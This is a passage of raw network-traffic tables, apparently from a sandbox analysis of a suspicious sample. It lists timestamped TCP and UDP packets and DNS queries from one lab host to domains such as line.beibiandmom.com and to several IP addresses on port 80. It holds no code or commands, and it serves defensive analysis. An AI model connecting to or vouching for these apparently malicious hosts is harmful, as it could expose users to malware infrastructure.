May 27, 2020 10:32:15.611685991 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611736059 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611896992 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611969948 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.611995935 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612721920 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612787962 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612816095 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612839937 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612864971 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612889051 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612912893 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612935066 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612970114 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.612993002 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613061905 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613084078 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613804102 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613838911 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613867998 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613889933 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613919020 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613945007 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.613965034 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:15.615792036 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.615864992 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.616103888 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.616517067 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.751056910 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:15.830203056 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.101260900 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:16.211739063 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.211793900 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.211816072 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.211836100 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.211855888 CEST	80	49711	89.111.132.159	192.168.1.102
May 27, 2020 10:32:16.226716995 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:16.818667889 CEST	49711	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:16.818860054 CEST	49712	80	192.168.1.102	89.111.132.159
May 27, 2020 10:32:17.310686111 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:18.359118938 CEST	49714	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:18.359167099 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:18.428252935 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:18.428730965 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:18.430227995 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:18.433640003 CEST	80	49714	185.98.87.176	192.168.1.102
May 27, 2020 10:32:18.433849096 CEST	49714	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:18.499064922 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.067949057 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.067981005 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068002939 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068016052 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068028927 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068068981 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068121910 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068135977 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068150997 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068200111 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.068267107 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.068345070 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.258272886 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258318901 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258347988 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258367062 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258383989 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258404016 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258651018 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258687019 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258789062 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.258816004 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.261748075 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.267874956 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.443551064 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443600893 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443625927 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443649054 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443869114 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.443907976 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443936110 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.443959951 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444025993 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444052935 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444138050 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444164038 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444430113 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444477081 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.444780111 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.445230007 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445305109 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445355892 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445398092 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445430040 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445460081 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.445487976 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.446002007 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.513025999 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.513089895 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.513108969 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.513134956 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.513153076 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.513303995 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.513818026 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.514511108 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.627310991 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627352953 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627444029 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627476931 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627629042 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627644062 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627662897 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627723932 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627737045 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.627738953 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627832890 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627883911 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627922058 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.627966881 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.628037930 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.628113031 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.710738897 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:19.811583996 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811621904 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811645985 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811666012 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811691999 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811701059 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811718941 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811736107 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811753988 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811772108 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811888933 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811925888 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.811944962 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.812010050 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.812814951 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.992378950 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992446899 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992491961 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992544889 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992572069 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992599010 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992624044 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992650032 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992676020 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992702007 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.992710114 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.992799997 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.992854118 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.995877981 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.995928049 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.995946884 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.995963097 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.995980024 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996021986 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996040106 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996081114 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996098995 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996138096 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996156931 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996179104 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:19.996505022 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:19.996831894 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.061790943 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.062072992 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.177931070 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.177973986 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.177999973 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178025007 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178049088 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178072929 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178109884 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178158998 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178184986 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178210020 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178234100 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178257942 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178282022 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.178472996 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.178560019 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.360054970 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360096931 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360122919 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360141993 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360224962 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360284090 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360302925 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360332012 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360354900 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360430002 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360450029 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360467911 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360486984 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.360577106 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.360693932 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.541754961 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541805983 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541831970 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541855097 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541886091 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541918993 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541929960 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541953087 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.541979074 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.542002916 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.542027950 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.542052984 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.542186975 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.542972088 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.543042898 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.544581890 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544625998 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544655085 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544677019 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544697046 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544714928 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544743061 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544756889 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.544779062 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.548655033 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.612103939 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.626538038 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.725719929 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725759029 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725778103 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725795984 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725812912 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725830078 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725848913 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725892067 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725914955 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.725975990 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.726006031 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.726031065 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.726063967 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.728984118 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729016066 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729036093 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729054928 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729140997 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729185104 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729228973 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729290962 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729310989 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729330063 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729351997 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.729379892 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.737308025 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.745567083 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.745760918 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.814949989 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.815407991 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:20.909332037 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909393072 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909424067 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909446001 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909466028 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909487963 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909507990 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.909528971 CEST	80	49713	185.98.87.176	192.168.1.102
May 27, 2020 10:32:20.913028002 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:22.402045965 CEST	49714	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:22.402312040 CEST	49713	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.143768072 CEST	49715	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.143923998 CEST	49716	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.216217995 CEST	80	49716	185.98.87.176	192.168.1.102
May 27, 2020 10:32:24.216531992 CEST	49716	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.217519045 CEST	49716	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.218743086 CEST	80	49715	185.98.87.176	192.168.1.102
May 27, 2020 10:32:24.219397068 CEST	49715	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:24.289076090 CEST	80	49716	185.98.87.176	192.168.1.102
May 27, 2020 10:32:24.511955023 CEST	49709	80	192.168.1.102	85.239.35.110
May 27, 2020 10:32:24.674736977 CEST	80	49716	185.98.87.176	192.168.1.102
May 27, 2020 10:32:24.674777031 CEST	80	49716	185.98.87.176	192.168.1.102
May 27, 2020 10:32:24.675470114 CEST	49716	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:25.811492920 CEST	49715	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:25.811758995 CEST	49716	80	192.168.1.102	185.98.87.176
May 27, 2020 10:32:34.122040033 CEST	49709	80	192.168.1.102	85.239.35.110

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2020 10:30:25.312640905 CEST	62961	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:25.333288908 CEST	53	62961	8.8.8.8	192.168.1.102
May 27, 2020 10:30:25.462846041 CEST	62055	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:25.511173964 CEST	53	62055	8.8.8.8	192.168.1.102
May 27, 2020 10:30:25.515865088 CEST	54105	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:25.577647924 CEST	53	54105	8.8.8.8	192.168.1.102
May 27, 2020 10:30:25.875488997 CEST	49343	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:25.917992115 CEST	53	49343	8.8.8.8	192.168.1.102
May 27, 2020 10:30:46.047513008 CEST	61638	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:46.077400923 CEST	53	61638	8.8.8.8	192.168.1.102
May 27, 2020 10:30:46.269572020 CEST	54592	53	192.168.1.102	8.8.8.8
May 27, 2020 10:30:46.289980888 CEST	53	54592	8.8.8.8	192.168.1.102
May 27, 2020 10:31:02.204755068 CEST	62983	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:02.237215996 CEST	53	62983	8.8.8.8	192.168.1.102
May 27, 2020 10:31:04.456640959 CEST	62754	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:04.476974010 CEST	53	62754	8.8.8.8	192.168.1.102
May 27, 2020 10:31:04.485635996 CEST	63027	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:04.505984068 CEST	53	63027	8.8.8.8	192.168.1.102
May 27, 2020 10:31:04.580400944 CEST	55959	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:04.600909948 CEST	53	55959	8.8.8.8	192.168.1.102
May 27, 2020 10:31:32.181041956 CEST	59896	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:32.222021103 CEST	53	59896	8.8.8.8	192.168.1.102
May 27, 2020 10:31:33.179737091 CEST	59896	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:33.208954096 CEST	53	59896	8.8.8.8	192.168.1.102
May 27, 2020 10:31:34.184379101 CEST	59896	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:34.225735903 CEST	53	59896	8.8.8.8	192.168.1.102
May 27, 2020 10:31:36.188870907 CEST	59896	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:36.218251944 CEST	53	59896	8.8.8.8	192.168.1.102
May 27, 2020 10:31:40.204955101 CEST	59896	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:40.243860960 CEST	53	59896	8.8.8.8	192.168.1.102
May 27, 2020 10:31:47.885741949 CEST	54354	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:47.923527956 CEST	53	54354	8.8.8.8	192.168.1.102
May 27, 2020 10:31:50.997082949 CEST	65010	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:51.017995119 CEST	53	65010	8.8.8.8	192.168.1.102
May 27, 2020 10:31:51.031065941 CEST	51973	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:51.061683893 CEST	53	51973	8.8.8.8	192.168.1.102
May 27, 2020 10:31:51.089375973 CEST	59059	53	192.168.1.102	8.8.8.8
May 27, 2020 10:31:51.110342026 CEST	53	59059	8.8.8.8	192.168.1.102
May 27, 2020 10:32:12.827723026 CEST	61783	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:12.859177113 CEST	53	61783	8.8.8.8	192.168.1.102
May 27, 2020 10:32:14.241375923 CEST	51916	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:14.272124052 CEST	53	51916	8.8.8.8	192.168.1.102
May 27, 2020 10:32:17.275216103 CEST	61046	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:17.306881905 CEST	53	61046	8.8.8.8	192.168.1.102
May 27, 2020 10:32:18.279819965 CEST	57108	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:18.311316967 CEST	53	57108	8.8.8.8	192.168.1.102
May 27, 2020 10:32:22.849462032 CEST	60308	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:22.881279945 CEST	53	60308	8.8.8.8	192.168.1.102
May 27, 2020 10:32:23.991983891 CEST	50105	53	192.168.1.102	8.8.8.8
May 27, 2020 10:32:24.022182941 CEST	53	50105	8.8.8.8	192.168.1.102

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 27, 2020 10:30:46.047513008 CEST	192.168.1.102	8.8.8.8	0x9090	Standard query (0)	gstat.ddoborguild.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.456640959 CEST	192.168.1.102	8.8.8.8	0x125d	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.485635996 CEST	192.168.1.102	8.8.8.8	0xefb0	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:04.580400944 CEST	192.168.1.102	8.8.8.8	0xf15a	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:50.997082949 CEST	192.168.1.102	8.8.8.8	0x6117	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:51.031065941 CEST	192.168.1.102	8.8.8.8	0x4c6a	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:31:51.089375973 CEST	192.168.1.102	8.8.8.8	0x3472	Standard query (0)	mcc.avast.com	A (IP address)	IN (0x0001)
May 27, 2020 10:32:14.241375923 CEST	192.168.1.102	8.8.8.8	0x5b56	Standard query (0)	line.beibiandmom.com	A (IP address)	IN (0x0001)
May 27, 2020 10:32:18.279819965 CEST	192.168.1.102	8.8.8.8	0x74ee	Standard query (0)	line.beibiandmom.com	A (IP address)	IN (0x0001)
May 27, 2020 10:32:23.991983891 CEST	192.168.1.102	8.8.8.8	0x3b3a	Standard query (0)	line.beibiandmom.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
